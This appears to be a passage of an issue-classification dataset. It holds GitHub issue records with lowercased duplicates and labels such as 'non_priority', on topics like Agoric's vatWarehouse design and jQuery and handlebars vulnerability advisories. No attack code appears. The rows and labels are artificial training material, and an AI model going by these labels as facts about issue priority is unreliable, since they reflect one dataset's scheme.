waiting for someone to send them a message. Likewise, if we can predict that a vat is not likely to be used for a while, we can **evict** it. ## Description of the Design We need something to coordinate the creation/destruction of these VatManagers. The first issue is - [x] what it should be called. It needs - [x] an API call which, at least, ~~returns~~ delivers to a VatManager for a given vatID. This call probably needs to be async, which means the rest of the kernel (`deliverToVat`, etc) must be prepared to accept a Promise back from this call. - [x] The call should use an existing manager, if there is one, and - [x] if not it should create one (which entails - [x] creating a worker, loading the vat state into it - [ ] by loading a snapshot and/or - [x] replaying a transcript). Our name for this create-or-return-cached-object pattern is "provide", so this API should probably be spelled `manager = await provideVatManager(vatID)`. It also needs - [x] an API call to create a vat in the first place (initialize whatever offline state will be necessary for a new vat). This does not need to return a VatManager, but - [x] it should enable a future `provideVatManager` call. - [x] It will be called during `initializeSwingset` for all static vats, and - [x] during the dynamic vat creation call for dynamic vats. - [x] It should be matched with a similar destroy() call for when a dynamic vat is terminated. The vat manager manager should have - [x] the ability to evict VatManagers that are idle. It needs a way to know that the caller of `provideVatManager` is no longer using the object that method returned. - [x] Once that is the case, it should be allowed to destroy the VatManager at any moment (and terminate/cleanup the associated worker), as long as it can - [x] restore the worker's state later. possible future issues: - "what vats are online?" port - terminate stuff in its own crank like creation? We need to coordinate changes to the transcript with changes to any snapshots that were stored. We might consider having a special crank type to record a snapshot and truncate the transcript: no user code would run during this crank, but the transcripts (in the kernel DB) would be atomically truncated in the same transaction that changes the snapshot ID. Depending upon what sort of heuristics and eviction policy we use, we might also want an API to communicate hints about usage frequency to this new manager thing. We might record a property with each vat to say whether it is likely to be frequently used or not, which this manager thing could use to make its eviction decisions. Alternatively, the manager could rely exclusively upon its own observations of `provideVatManager` to decide which vats are deserving of RAM and which should be kept offline as much as possible. ## Consensus Notes The presence or absence of a VatManager in RAM should not be part of the consensus state. Some members of a chain may choose to allocate more memory than others, and this does not affect the equivalence of their vats' behavior. Snapshots are also not part of the consensus state, because we don't want to rely upon the internal serialization details of the JS engine. As a result, the truncated transcript is also not part of consensus state (it gets truncated only when a snapshot is taken). The consensus state *does* contain the full un-truncated transcript, which is necessary for vat migration as well as off-chain debugging replay of a vat. Snapshots and truncated transcripts are for the benefit of the local node, to make reloading a single vat (or the entire process) faster and cheaper. cc @FUDCo @erights @dtribble @dckc
1.0
design vatWarehouse API for demand-paged vats - ## What is the Problem Being Solved? We currently maintain a `VatManager` in RAM for all non-terminated vats, both static and dynamic. These VatManager objects are tracked in `ephemeral.vats`, a Map from the vat ID string to a record that includes the manager: https://github.com/Agoric/agoric-sdk/blob/65105f795872a2928ce7d0bbe0971fa5b4c50897/packages/SwingSet/src/kernel/kernel.js#L125-L129 A new manager is created at startup (for all static+dynamic vats in the DB), and also when a new dynamic vat is created. The manager is destroyed for dynamic vats that terminate. Each time we need to deliver a message or promise resolution notification into a vat, we pull the manager off `ephemeral.vats` and use it for the delivery, with something like: ```js const vat = ephemeral.vats.get(vatID); const deliveryResult = await vat.manager.deliver(vatDelivery); ``` (look at the implementation of `deliverAndLogToVat` and `deliverToVat`, among others). We can **reduce kernel memory usage by evicting idle managers from memory**. We can **reduce overall system memory usage by terminating the corresponding workers** (e.g. telling the XS worker to exit). At startup, we can reduce memory and CPU usage by not creating managers for vats that are not yet in use (**lazy-loading vats on-demand**). There are policy / performance heuristic questions to answer: there's a tradeoff between latency and overall performance. If we correctly predict that certain vats are likely to be used right away (e.g. the fundamental economic vats, comms/vattp infrastructure), we might want to load them at startup instead of waiting for someone to send them a message. Likewise, if we can predict that a vat is not likely to be used for a while, we can **evict** it. ## Description of the Design We need something to coordinate the creation/destruction of these VatManagers. The first issue is - [x] what it should be called. It needs - [x] an API call which, at least, ~~returns~~ delivers to a VatManager for a given vatID. This call probably needs to be async, which means the rest of the kernel (`deliverToVat`, etc) must be prepared to accept a Promise back from this call. - [x] The call should use an existing manager, if there is one, and - [x] if not it should create one (which entails - [x] creating a worker, loading the vat state into it - [ ] by loading a snapshot and/or - [x] replaying a transcript). Our name for this create-or-return-cached-object pattern is "provide", so this API should probably be spelled `manager = await provideVatManager(vatID)`. It also needs - [x] an API call to create a vat in the first place (initialize whatever offline state will be necessary for a new vat). This does not need to return a VatManager, but - [x] it should enable a future `provideVatManager` call. - [x] It will be called during `initializeSwingset` for all static vats, and - [x] during the dynamic vat creation call for dynamic vats. - [x] It should be matched with a similar destroy() call for when a dynamic vat is terminated. The vat manager manager should have - [x] the ability to evict VatManagers that are idle. It needs a way to know that the caller of `provideVatManager` is no longer using the object that method returned. - [x] Once that is the case, it should be allowed to destroy the VatManager at any moment (and terminate/cleanup the associated worker), as long as it can - [x] restore the worker's state later. possible future issues: - "what vats are online?" port - terminate stuff in its own crank like creation? We need to coordinate changes to the transcript with changes to any snapshots that were stored. We might consider having a special crank type to record a snapshot and truncate the transcript: no user code would run during this crank, but the transcripts (in the kernel DB) would be atomically truncated in the same transaction that changes the snapshot ID. Depending upon what sort of heuristics and eviction policy we use, we might also want an API to communicate hints about usage frequency to this new manager thing. We might record a property with each vat to say whether it is likely to be frequently used or not, which this manager thing could use to make its eviction decisions. Alternatively, the manager could rely exclusively upon its own observations of `provideVatManager` to decide which vats are deserving of RAM and which should be kept offline as much as possible. ## Consensus Notes The presence or absence of a VatManager in RAM should not be part of the consensus state. Some members of a chain may choose to allocate more memory than others, and this does not affect the equivalence of their vats' behavior. Snapshots are also not part of the consensus state, because we don't want to rely upon the internal serialization details of the JS engine. As a result, the truncated transcript is also not part of consensus state (it gets truncated only when a snapshot is taken). The consensus state *does* contain the full un-truncated transcript, which is necessary for vat migration as well as off-chain debugging replay of a vat. Snapshots and truncated transcripts are for the benefit of the local node, to make reloading a single vat (or the entire process) faster and cheaper. cc @FUDCo @erights @dtribble @dckc
non_priority
design vatwarehouse api for demand paged vats what is the problem being solved we currently maintain a vatmanager in ram for all non terminated vats both static and dynamic these vatmanager objects are tracked in ephemeral vats a map from the vat id string to a record that includes the manager a new manager is created at startup for all static dynamic vats in the db and also when a new dynamic vat is created the manager is destroyed for dynamic vats that terminate each time we need to deliver a message or promise resolution notification into a vat we pull the manager off ephemeral vats and use it for the delivery with something like js const vat ephemeral vats get vatid const deliveryresult await vat manager deliver vatdelivery look at the implementation of deliverandlogtovat and delivertovat among others we can reduce kernel memory usage by evicting idle managers from memory we can reduce overall system memory usage by terminating the corresponding workers e g telling the xs worker to exit at startup we can reduce memory and cpu usage by not creating managers for vats that are not yet in use lazy loading vats on demand there are policy performance heuristic questions to answer there s a tradeoff between latency and overall performance if we correctly predict that certain vats are likely to be used right away e g the fundamental economic vats comms vattp infrastructure we might want to load them at startup instead of waiting for someone to send them a message likewise if we can predict that a vat is not likely to be used for a while we can evict it description of the design we need something to coordinate the creation destruction of these vatmanagers the first issue is what it should be called it needs an api call which at least returns delivers to a vatmanager for a given vatid this call probably needs to be async which means the rest of the kernel delivertovat etc must be prepared to accept a promise back from this call the call should use an existing manager if there is one and if not it should create one which entails creating a worker loading the vat state into it by loading a snapshot and or replaying a transcript our name for this create or return cached object pattern is provide so this api should probably be spelled manager await providevatmanager vatid it also needs an api call to create a vat in the first place initialize whatever offline state will be necessary for a new vat this does not need to return a vatmanager but it should enable a future providevatmanager call it will be called during initializeswingset for all static vats and during the dynamic vat creation call for dynamic vats it should be matched with a similar destroy call for when a dynamic vat is terminated the vat manager manager should have the ability to evict vatmanagers that are idle it needs a way to know that the caller of providevatmanager is no longer using the object that method returned once that is the case it should be allowed to destroy the vatmanager at any moment and terminate cleanup the associated worker as long as it can restore the worker s state later possible future issues what vats are online port terminate stuff in its own crank like creation we need to coordinate changes to the transcript with changes to any snapshots that were stored we might consider having a special crank type to record a snapshot and truncate the transcript no user code would run during this crank but the transcripts in the kernel db would be atomically truncated in the same transaction that changes the snapshot id depending upon what sort of heuristics and eviction policy we use we might also want an api to communicate hints about usage frequency to this new manager thing we might record a property with each vat to say whether it is likely to be frequently used or not which this manager thing could use to make its eviction decisions alternatively the manager could rely exclusively upon its own observations of providevatmanager to decide which vats are deserving of ram and which should be kept offline as much as possible consensus notes the presence or absence of a vatmanager in ram should not be part of the consensus state some members of a chain may choose to allocate more memory than others and this does not affect the equivalence of their vats behavior snapshots are also not part of the consensus state because we don t want to rely upon the internal serialization details of the js engine as a result the truncated transcript is also not part of consensus state it gets truncated only when a snapshot is taken the consensus state does contain the full un truncated transcript which is necessary for vat migration as well as off chain debugging replay of a vat snapshots and truncated transcripts are for the benefit of the local node to make reloading a single vat or the entire process faster and cheaper cc fudco erights dtribble dckc
0
64,465
6,905,070,200
IssuesEvent
2017-11-27 04:29:10
bskinn/sphobjinv
https://api.github.com/repos/bskinn/sphobjinv
closed
Convert SuperDataObj to abstract Base Class
needs tests todo
I'm explicitly extending it and not going to instantiate it, so it is most appropriately defined as an ABC.
1.0
Convert SuperDataObj to abstract Base Class - I'm explicitly extending it and not going to instantiate it, so it is most appropriately defined as an ABC.
non_priority
convert superdataobj to abstract base class i m explicitly extending it and not going to instantiate it so it is most appropriately defined as an abc
0
92,927
26,810,506,467
IssuesEvent
2023-02-01 21:57:21
In-Data-We-Trust/In-Data-We-Trust.github.io
https://api.github.com/repos/In-Data-We-Trust/In-Data-We-Trust.github.io
closed
Update About us Page and Home Page from Michelle Information
Research Website Build
Following a review of my website, My marketing adviser has recommended some changes. [IDWT - About - v1 22.11.22.docx](https://github.com/In-Data-We-Trust/In-Data-We-Trust.github.io/files/10130396/IDWT.-.About.-.v1.22.11.22.docx) [IDWT - Home - v1 23.11.22.docx](https://github.com/In-Data-We-Trust/In-Data-We-Trust.github.io/files/10130395/IDWT.-.Home.-.v1.23.11.22.docx)
1.0
Update About us Page and Home Page from Michelle Information - Following a review of my website, My marketing adviser has recommended some changes. [IDWT - About - v1 22.11.22.docx](https://github.com/In-Data-We-Trust/In-Data-We-Trust.github.io/files/10130396/IDWT.-.About.-.v1.22.11.22.docx) [IDWT - Home - v1 23.11.22.docx](https://github.com/In-Data-We-Trust/In-Data-We-Trust.github.io/files/10130395/IDWT.-.Home.-.v1.23.11.22.docx)
non_priority
update about us page and home page from michelle information following a review of my website my marketing adviser has recommended some changes
0
91,153
15,856,373,937
IssuesEvent
2021-04-08 02:11:33
jinuem/node-sass
https://api.github.com/repos/jinuem/node-sass
opened
WS-2019-0331 (Medium) detected in handlebars-4.1.2.tgz
security vulnerability
## WS-2019-0331 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /node-sass/package.json</p> <p>Path to vulnerable library: node-sass/node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - istanbul-0.4.5.tgz (Root Library) - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system. <p>Publish Date: 2019-11-13 <p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics not available</p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p> <p>Release Date: 2019-12-05</p> <p>Fix Resolution: handlebars - 4.5.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
WS-2019-0331 (Medium) detected in handlebars-4.1.2.tgz - ## WS-2019-0331 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /node-sass/package.json</p> <p>Path to vulnerable library: node-sass/node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - istanbul-0.4.5.tgz (Root Library) - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system. <p>Publish Date: 2019-11-13 <p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics not available</p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p> <p>Release Date: 2019-12-05</p> <p>Fix Resolution: handlebars - 4.5.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
ws medium detected in handlebars tgz ws medium severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file node sass package json path to vulnerable library node sass node modules handlebars package json dependency hierarchy istanbul tgz root library x handlebars tgz vulnerable library vulnerability details arbitrary code execution vulnerability found in handlebars before lookup helper fails to validate templates attack may submit templates that execute arbitrary javascript in the system publish date url a href cvss score details base score metrics not available suggested fix type upgrade version origin a href release date fix resolution handlebars step up your open source security game with whitesource
0
71,816
7,261,764,242
IssuesEvent
2018-02-19 00:01:18
ezrosent/allocators-rs
https://api.github.com/repos/ezrosent/allocators-rs
closed
Switch object-alloc and dependents to NonNull raw pointers
component-mmap-alloc component-object-alloc component-object-alloc-test component-slab-alloc experience-medium help wanted
Now that https://github.com/rust-lang/rust/pull/46952 has landed, we should switch to using NonNull pointers where appropriate. This will help with both performance and correctness. This issue focuses only on `object-alloc`'s traits and the crates that depend on it. #147 focuses on other uses.
1.0
Switch object-alloc and dependents to NonNull raw pointers - Now that https://github.com/rust-lang/rust/pull/46952 has landed, we should switch to using NonNull pointers where appropriate. This will help with both performance and correctness. This issue focuses only on `object-alloc`'s traits and the crates that depend on it. #147 focuses on other uses.
non_priority
switch object alloc and dependents to nonnull raw pointers now that has landed we should switch to using nonnull pointers where appropriate this will help with both performance and correctness this issue focuses only on object alloc s traits and the crates that depend on it focuses on other uses
0
443,501
30,921,573,528
IssuesEvent
2023-08-06 00:58:15
ThomasThelen/militant-map-neo4j
https://api.github.com/repos/ThomasThelen/militant-map-neo4j
closed
Document Relations
documentation
The relations have the majority of data, including the description and date of the edge. Add an example query to retrieve the information and a blurb in the Readme about the data model
1.0
Document Relations - The relations have the majority of data, including the description and date of the edge. Add an example query to retrieve the information and a blurb in the Readme about the data model
non_priority
document relations the relations have the majority of data including the description and date of the edge add an example query to retrieve the information and a blurb in the readme about the data model
0
34,611
12,294,659,703
IssuesEvent
2020-05-11 01:01:10
Mohib-hub/rcloud
https://api.github.com/repos/Mohib-hub/rcloud
opened
CVE-2020-11022 (Medium) detected in jquery-2.1.4.min.js
security vulnerability
## CVE-2020-11022 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>jquery-2.1.4.min.js</b></p></summary> <p>JavaScript library for DOM operations</p> <p>Library home page: <a href="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.min.js">https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.min.js</a></p> <p>Path to dependency file: /tmp/ws-scm/rcloud/node_modules/js-base64/test/index.html</p> <p>Path to vulnerable library: /rcloud/node_modules/js-base64/test/index.html</p> <p> Dependency Hierarchy: - :x: **jquery-2.1.4.min.js** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. <p>Publish Date: 2020-04-29 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022>CVE-2020-11022</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>6.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Changed - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p> <p>Release Date: 2020-04-29</p> <p>Fix Resolution: jQuery - 3.5.0</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"JavaScript","packageName":"jquery","packageVersion":"2.1.4","isTransitiveDependency":false,"dependencyTree":"jquery:2.1.4","isMinimumFixVersionAvailable":true,"minimumFixVersion":"jQuery - 3.5.0"}],"vulnerabilityIdentifier":"CVE-2020-11022","vulnerabilityDetails":"In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022","cvss3Severity":"medium","cvss3Score":"6.1","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Changed","C":"Low","UI":"Required","AV":"Network","I":"Low"},"extraData":{}}</REMEDIATE> -->
True
CVE-2020-11022 (Medium) detected in jquery-2.1.4.min.js - ## CVE-2020-11022 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>jquery-2.1.4.min.js</b></p></summary> <p>JavaScript library for DOM operations</p> <p>Library home page: <a href="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.min.js">https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.min.js</a></p> <p>Path to dependency file: /tmp/ws-scm/rcloud/node_modules/js-base64/test/index.html</p> <p>Path to vulnerable library: /rcloud/node_modules/js-base64/test/index.html</p> <p> Dependency Hierarchy: - :x: **jquery-2.1.4.min.js** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. <p>Publish Date: 2020-04-29 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022>CVE-2020-11022</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>6.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Changed - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p> <p>Release Date: 2020-04-29</p> <p>Fix Resolution: jQuery - 3.5.0</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"JavaScript","packageName":"jquery","packageVersion":"2.1.4","isTransitiveDependency":false,"dependencyTree":"jquery:2.1.4","isMinimumFixVersionAvailable":true,"minimumFixVersion":"jQuery - 3.5.0"}],"vulnerabilityIdentifier":"CVE-2020-11022","vulnerabilityDetails":"In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022","cvss3Severity":"medium","cvss3Score":"6.1","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Changed","C":"Low","UI":"Required","AV":"Network","I":"Low"},"extraData":{}}</REMEDIATE> -->
non_priority
cve medium detected in jquery min js cve medium severity vulnerability vulnerable library jquery min js javascript library for dom operations library home page a href path to dependency file tmp ws scm rcloud node modules js test index html path to vulnerable library rcloud node modules js test index html dependency hierarchy x jquery min js vulnerable library vulnerability details in jquery versions greater than or equal to and before passing html from untrusted sources even after sanitizing it to one of jquery s dom manipulation methods i e html append and others may execute untrusted code this problem is patched in jquery publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction required scope changed impact metrics confidentiality impact low integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution jquery isopenpronvulnerability false ispackagebased true isdefaultbranch true packages vulnerabilityidentifier cve vulnerabilitydetails in jquery versions greater than or equal to and before passing html from untrusted sources even after sanitizing it to one of jquery dom manipulation methods i e html append and others may execute untrusted code this problem is patched in jquery vulnerabilityurl
0
56,225
13,776,343,405
IssuesEvent
2020-10-08 09:19:48
trilinos/Trilinos
https://api.github.com/repos/trilinos/Trilinos
closed
Xpetra: build error under windows
impacting: build pkg: Xpetra type: bug
## Bug Report @trilinos/xpetra ### Description A user reported this error: ``` D:\winsame\cary\vorpalall-dev3\builds\trilinos-13.0.0\packages\xpetra\sup\Utils/Xpetra_MatrixMatrix.hpp(62,10): fatal error: 'execinfo.h' file not found #include <execinfo.h> ``` He tried https://github.com/kokkos/kokkos/pull/2977/commits/9f6f9f8ecd320470d25e0094603c0255ff6afb40, but that did not fix the error.
1.0
Xpetra: build error under windows - ## Bug Report @trilinos/xpetra ### Description A user reported this error: ``` D:\winsame\cary\vorpalall-dev3\builds\trilinos-13.0.0\packages\xpetra\sup\Utils/Xpetra_MatrixMatrix.hpp(62,10): fatal error: 'execinfo.h' file not found #include <execinfo.h> ``` He tried https://github.com/kokkos/kokkos/pull/2977/commits/9f6f9f8ecd320470d25e0094603c0255ff6afb40, but that did not fix the error.
non_priority
xpetra build error under windows bug report trilinos xpetra description a user reported this error d winsame cary vorpalall builds trilinos packages xpetra sup utils xpetra matrixmatrix hpp fatal error execinfo h file not found include he tried but that did not fix the error
0
237,119
19,593,528,661
IssuesEvent
2022-01-05 15:24:22
elastic/kibana
https://api.github.com/repos/elastic/kibana
closed
Failing test: "before all" hook for "displays the `default ECS` category (by default)" - Fields Browser Fields Browser rendering "before all" hook for "displays the `default ECS` category (by default)"
failed-test Team:SIEM Team: SecuritySolution
A test failed on a tracked branch ``` CypressError: Timed out retrying: Expected to find content: 'SIEM' within the selector: 'a' but never did. Because this error occurred during a 'before all' hook we are skipping the remaining tests in the current suite: 'Fields Browser rendering' at cypressErr (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149934:9) at throwErr (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149867:11) at Object.throwErrByPath (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149915:3) at retry (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:144197:19) at onFailFn (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:132448:16) at tryCatcher (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:167415:23) at Promise._settlePromiseFromHandler (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165351:31) at Promise._settlePromise (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165408:18) at Promise._settlePromise0 (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165453:10) at Promise._settlePromises (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165528:18) at Async../node_modules/bluebird/js/release/async.js.Async._drainQueue (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162140:16) at Async../node_modules/bluebird/js/release/async.js.Async._drainQueues (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162150:10) at Async.drainQueues (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162024:14) ``` First failure: [Jenkins Build](https://kibana-ci.elastic.co/job/elastic+kibana+7.x/3640/) <!-- kibanaCiData = {"failed-test":{"test.class":"\"before all\" hook for \"displays the `default ECS` category (by default)\"","test.name":"Fields Browser Fields Browser rendering \"before all\" hook for \"displays the `default ECS` category (by default)\"","test.failCount":26}} -->
1.0
Failing test: "before all" hook for "displays the `default ECS` category (by default)" - Fields Browser Fields Browser rendering "before all" hook for "displays the `default ECS` category (by default)" - A test failed on a tracked branch ``` CypressError: Timed out retrying: Expected to find content: 'SIEM' within the selector: 'a' but never did. Because this error occurred during a 'before all' hook we are skipping the remaining tests in the current suite: 'Fields Browser rendering' at cypressErr (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149934:9) at throwErr (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149867:11) at Object.throwErrByPath (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:149915:3) at retry (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:144197:19) at onFailFn (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:132448:16) at tryCatcher (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:167415:23) at Promise._settlePromiseFromHandler (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165351:31) at Promise._settlePromise (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165408:18) at Promise._settlePromise0 (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165453:10) at Promise._settlePromises (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:165528:18) at Async../node_modules/bluebird/js/release/async.js.Async._drainQueue (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162140:16) at Async../node_modules/bluebird/js/release/async.js.Async._drainQueues (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162150:10) at Async.drainQueues (http://elastic:changeme@localhost:61121/__cypress/runner/cypress_runner.js:162024:14) ``` First failure: [Jenkins Build](https://kibana-ci.elastic.co/job/elastic+kibana+7.x/3640/) <!-- kibanaCiData = {"failed-test":{"test.class":"\"before all\" hook for \"displays the `default ECS` category (by default)\"","test.name":"Fields Browser Fields Browser rendering \"before all\" hook for \"displays the `default ECS` category (by default)\"","test.failCount":26}} -->
non_priority
failing test before all hook for displays the default ecs category by default fields browser fields browser rendering before all hook for displays the default ecs category by default a test failed on a tracked branch cypresserror timed out retrying expected to find content siem within the selector a but never did because this error occurred during a before all hook we are skipping the remaining tests in the current suite fields browser rendering at cypresserr at throwerr at object throwerrbypath at retry at onfailfn at trycatcher at promise settlepromisefromhandler at promise settlepromise at promise at promise settlepromises at async node modules bluebird js release async js async drainqueue at async node modules bluebird js release async js async drainqueues at async drainqueues first failure
0
70,633
30,699,599,454
IssuesEvent
2023-07-26 21:42:34
hashicorp/terraform-provider-aws
https://api.github.com/repos/hashicorp/terraform-provider-aws
closed
[Bug]: Forced replacement of `aws_vpclattice_service_network_vpc_association` when using ARN as `service_network_identifier`
bug service/vpclattice
